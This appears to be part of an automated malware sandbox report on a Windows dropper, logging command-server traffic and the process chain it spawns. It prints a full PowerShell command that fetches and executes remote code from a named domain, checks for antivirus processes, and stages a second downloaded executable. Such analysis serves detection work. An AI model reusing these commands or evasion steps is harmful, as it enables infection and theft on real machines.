                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=aavtssq15q4jpieodmjrp141oc; expires=Fri, 02 May 2025 05:03:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rzQLan1a1hAY6sAKNxk9SdwWL0keFO%2BwZpfbOmMpjgy024AAGICorhWJ5gtE7pitgmG739KesCuqSbd0RgJeL4udj0k1tfsZbEzBLNuVroI2sRXyzASuYOkjcb%2F2d5Ao%2FYY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c492f5543fa-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1566&rtt_var=601&sent=7&recv=11&lost=0&retrans=0&sent_bytes=2837&recv_bytes=8055&delivery_rate=1801357&cwnd=159&unsent_bytes=0&cid=e57c454fcb85fee1&ts=519&x=0"
                                                                                                                                                                                                                                                              2025-01-06 11:16:48 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2025-01-06 11:16:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                              6 | 192.168.2.5 | 49888 | 104.21.44.159 | 443 | 1532 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                              2025-01-06 11:16:49 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=T8MBODCY143BWRCL3J3
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1257
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
                                                                                                                                                                                                                                                              2025-01-06 11:16:49 UTC1257OUTData Raw: 2d 2d 54 38 4d 42 4f 44 43 59 31 34 33 42 57 52 43 4c 33 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 41 45 37 36 32 30 36 43 32 42 30 36 31 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 54 38 4d 42 4f 44 43 59 31 34 33 42 57 52 43 4c 33 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 38 4d 42 4f 44 43 59 31 34 33 42 57 52 43 4c 33 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52
                                                                                                                                                                                                                                                              Data Ascii: --T8MBODCY143BWRCL3J3Content-Disposition: form-data; name="hwid"59AE76206C2B06176D75A801C764DBB8--T8MBODCY143BWRCL3J3Content-Disposition: form-data; name="pid"1--T8MBODCY143BWRCL3J3Content-Disposition: form-data; name="lid"hRjzG3--TR
                                                                                                                                                                                                                                                              2025-01-06 11:16:49 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:49 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=1397uomjh7557chalofrjqhph7; expires=Fri, 02 May 2025 05:03:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SGVnqB9gQ1NEYM%2FckhPMbpO0bp1OQCBVha%2FLdZNP%2Br2Hl6tknuZ%2Fj98e0F9z5mYw5WsNoGlBsVIZSs9FUaZyQVgO8eOPspN6njfVrmHWvZicvL6jMkklVvWuro0ospwtibk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c4f9aac431f-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1684&rtt_var=646&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2174&delivery_rate=1673352&cwnd=250&unsent_bytes=0&cid=3ec8dcb61900e16d&ts=473&x=0"
                                                                                                                                                                                                                                                              2025-01-06 11:16:49 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2025-01-06 11:16:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                              7 | 192.168.2.5 | 49897 | 104.21.44.159 | 443 | 1532 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                              2025-01-06 11:16:50 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=Y2BM2JBPEECL
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 593404
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
                                                                                                                                                                                                                                                              2025-01-06 11:16:50 UTC15331OUTData Raw: 2d 2d 59 32 42 4d 32 4a 42 50 45 45 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 41 45 37 36 32 30 36 43 32 42 30 36 31 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 59 32 42 4d 32 4a 42 50 45 45 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 32 42 4d 32 4a 42 50 45 45 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 59 32 42 4d 32 4a 42 50 45 45 43 4c 0d 0a 43
                                                                                                                                                                                                                                                              Data Ascii: --Y2BM2JBPEECLContent-Disposition: form-data; name="hwid"59AE76206C2B06176D75A801C764DBB8--Y2BM2JBPEECLContent-Disposition: form-data; name="pid"1--Y2BM2JBPEECLContent-Disposition: form-data; name="lid"hRjzG3--TRON--Y2BM2JBPEECLC
2025-01-06 11:16:52 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:52 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ftj4jq7hru9rhpmlsco9nujv74; expires=Fri, 02 May 2025 05:03:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=18pe6v4g9BdEhlKhIORyhR%2FfOsRrEaJeICpcJLfKhzNq3HUm5jGxwwMgNfhRGgx9fDYAk3T071qwUVVqHDo%2BwAg4%2FkT4YMctQNob5D8m4esveJqTJ%2FBkCuZJGhboqkt6Yhk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c582b7e19c7-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1787&rtt_var=674&sent=340&recv=609&lost=0&retrans=0&sent_bytes=2836&recv_bytes=596010&delivery_rate=1618625&cwnd=146&unsent_bytes=0&cid=04aa5fd750f193a1&ts=1642&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49910 | 104.21.44.159 | 443 | 1532 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
Timestamp | Bytes transferred | Direction | Data
2025-01-06 11:16:52 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 113
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
2025-01-06 11:16:52 UTC | 113 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 35 39 41 45 37 36 32 30 36 43 32 42 30 36 31 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38
                                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397&hwid=59AE76206C2B06176D75A801C764DBB8
2025-01-06 11:16:53 UTC | 1124 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:53 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=f5nltevmc8evq44g2hsjst0c5g; expires=Fri, 02 May 2025 05:03:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jBdnGS2Y3n1G5YDF1m050h2BKHU60QzJP2wcVvu2%2F0cxamWdxgr3vLZnWn3V4uft4OHxq1mBhgN%2BFUmSbJLGN8423GS0ty2AJvMjR2eEbNGGQWObsHaw0LCrDHEdVq%2Fo6vY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c655c5480e2-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1458&rtt_var=563&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1013&delivery_rate=1916010&cwnd=120&unsent_bytes=0&cid=c4fa99af9230da2a&ts=475&x=0"
2025-01-06 11:16:53 UTC | 218 | IN | Data Raw: 64 34 0d 0a 36 58 61 4c 69 6d 72 69 58 39 77 4d 68 65 70 67 44 6c 4e 55 6b 48 72 62 49 76 6f 32 6c 49 39 4a 67 31 42 6f 6e 63 44 75 2b 6d 65 79 44 61 6e 2f 53 4e 68 39 74 48 6a 78 6d 68 4d 30 44 33 76 4d 56 62 68 48 6e 55 4f 36 2f 43 48 73 49 44 53 79 2b 4e 76 4e 55 39 74 41 75 62 35 65 31 41 50 7a 66 4f 33 45 46 48 59 6e 64 72 78 59 76 56 62 59 44 4b 61 6a 61 2b 5a 79 55 71 79 39 77 6f 46 46 6e 46 53 78 71 41 4b 57 4b 36 78 2f 76 37 5a 50 55 6e 77 2f 2f 42 4f 72 56 49 39 62 2f 66 77 38 36 6e 34 62 39 61 2b 65 70 6b 69 41 47 50 2f 56 43 59 34 76 67 33 2f 74 69 30 35 36 4b 79 43 79 56 76 6c 45 6a 68 53 75 76 32 57 68 4e 55 71 6e 38 4a 4f 6e 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: d46XaLimriX9wMhepgDlNUkHrbIvo2lI9Jg1BoncDu+meyDan/SNh9tHjxmhM0D3vMVbhHnUO6/CHsIDSy+NvNU9tAub5e1APzfO3EFHYndrxYvVbYDKaja+ZyUqy9woFFnFSxqAKWK6x/v7ZPUnw//BOrVI9b/fw86n4b9a+epkiAGP/VCY4vg3/ti056KyCyVvlEjhSuv2WhNUqn8JOn
2025-01-06 11:16:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49920 | 185.161.251.21 | 443 | 1532 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
Timestamp | Bytes transferred | Direction | Data
2025-01-06 11:16:53 UTC | 201 | OUT | GET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Host: cegu.shop
2025-01-06 11:16:54 UTC | 249 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:53 GMT
                                                                                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 329
                                                                                                                                                                                                                                                              Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              ETag: "676c9e2a-149"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
2025-01-06 11:16:54 UTC | 329 | IN | Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49927 | 172.67.208.58 | 443 | 1532 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
Timestamp | Bytes transferred | Direction | Data
2025-01-06 11:16:54 UTC | 206 | OUT | GET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Host: klipvumisui.shop
2025-01-06 11:16:54 UTC | 898 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:54 GMT
                                                                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                                                                              Content-Length: 8767044
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                                                                                                                              Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVQibXpBS51UPFE9QpMrZnfHqdc41fwe5jVhvr2ZTIDDupCBggPrWojXUkQ0Xx9tsRzg5RYDBdYm7TGvfgAcq0otn2Z2gy%2FyiEKp0abQIB8O5M7lBKN69GiylQSE3iqb4s%2Fc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c718aa1f799-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2153&min_rtt=1626&rtt_var=1665&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2868&recv_bytes=820&delivery_rate=499230&cwnd=97&unsent_bytes=0&cid=e61fa5090ee6ec6d&ts=285&x=0"
2025-01-06 11:16:54 UTC | 471 | IN | Data Ascii: MZP@!L!This program must be run under Win32$7



                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:06:16:01
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:73'424'035 bytes
                                                                                                                                                                                                                                                              MD5 hash:EDE2E7D64A73A46B252525A4136B47BF
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

Target ID:2
Start time:06:16:03
Start date:06/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /c move Archive Archive.cmd & Archive.cmd
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:06:16:03
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:06:16:03
Start date:06/01/2025
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0xc20000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:06:16:03
Start date:06/01/2025
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /I "opssvc wrsa"
Imagebase:0x650000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:06:16:04
Start date:06/01/2025
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0xc20000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:06:16:04
Start date:06/01/2025
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:0x650000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:06:16:04
Start date:06/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c md 811185
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:06:16:05
Start date:06/01/2025
Path:C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):true
Commandline:extrac32 /Y /E Thousand
Imagebase:0xda0000
File size:29'184 bytes
MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:10
Start time:06:16:05
Start date:06/01/2025
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /V "makes" Makes
Imagebase:0x650000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:06:16:06
Start date:06/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b 811185\M.com + Symbol + Bang + Sons + Prefix + Re + Answers + Frank + Chancellor + Enable 811185\M.com
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:06:16:06
Start date:06/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b ..\Gather + ..\Intend + ..\Couple + ..\Und + ..\Desktop + ..\Laboratories + ..\Leonard c
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:06:16:06
Start date:06/01/2025
Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
Wow64 process (32bit):true
Commandline:M.com c
Imagebase:0x930000
File size:947'288 bytes
MD5 hash:62D09F076E6E0240548C2F837536A46A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:true

Target ID:14
Start time:06:16:06
Start date:06/01/2025
Path:C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):true
Commandline:choice /d y /t 5
Imagebase:0xac0000
File size:28'160 bytes
MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:06:16:53
Start date:06/01/2025
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Imagebase:0x450000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:06:16:53
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:06:17:00
Start date:06/01/2025
Path:C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe"
Imagebase:0x340000
File size:8'767'044 bytes
MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 78%, ReversingLabs
Has exited:true

Target ID:20
Start time:06:17:02
Start date:06/01/2025
Path:C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$60296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe"
Imagebase:0x7ff632ac0000
File size:3'367'424 bytes
MD5 hash:F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:true

Target ID:21
Start time:06:17:03
Start date:06/01/2025
Path:C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT
